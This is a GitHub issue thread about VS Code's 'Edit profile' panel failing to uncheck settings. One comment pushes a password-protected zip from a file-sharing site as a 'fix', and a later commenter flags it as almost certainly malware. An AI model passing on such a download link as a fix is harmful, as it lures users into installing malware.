### ISSUE TITLE
Edit profile does not work

### ISSUE THREAD

**Issue by black-pwq** [microsoft/vscode#227034]
Does this issue occur when all extensions are disabled?: Yes/No

- VS Code Version: 1.92.2
- OS Version: Windows 10

Unchecking any boxes in "edit profile" panel will fail.

https://github.com/user-attachments/assets/d45729bd-0e68-46a5-879c-e7294f032746

Steps to Reproduce:

1. Open command palette and type "edit profile" (which means there is a profile other than the default one in the current working space).
2. Uncheck any box, e.g. Keyboard shortcut.

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by black-pwq** [comment]
@africanobyamugisha Could you describe your file link in the comment? Is that an official fix?

**Comment by gjsjohnmurray** [comment]
https://github.com/microsoft/vscode/issues/224566#issuecomment-2277462990gives a workaround until the next version ships {due by the end of next week).

The file link in the now-deleted comment was almost certainly malware.

/duplicate
